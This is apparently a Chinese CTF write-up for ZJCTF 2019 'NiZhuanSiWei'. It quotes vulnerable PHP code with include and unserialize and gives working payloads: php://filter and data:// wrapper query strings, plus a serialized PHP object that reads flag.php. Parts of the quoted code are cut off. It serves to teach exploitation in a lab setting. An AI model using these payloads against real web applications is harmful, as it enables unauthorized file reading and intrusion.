(反序列化)[ZJCTF 2019]NiZhuanSiWei

".file_get_contents($text,'r')."


"; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; } } else{ highlight_file(__FILE__); } ?>

利用点:

include和echo

由于file过滤了flag,不能读取flag.php

先查看useless.php

这里用到伪协议

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,welcome to the zjctf

base64encode得到

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

得到

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo

file)){  
            echo file_get_contents($this->file); 
            echo "
"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>

反序列化的连接点在这,让Flag类里的file为flag.php即可

?file=php://filter/convert.base64-encode/resource=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} //这样不行

//之后看别人的才发现问题

//还有之前反序列化的双引号是中文的(丢脸)

?file=useless.php&text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

值得注意的是得把php://filter/convert.base64-encode/resource=useless.php改回useless.php

不然里面的代码不会执行

补充一下echo会触发tostring(忘记说了)

你可能感兴趣的:(web反序列化,php,web,学习)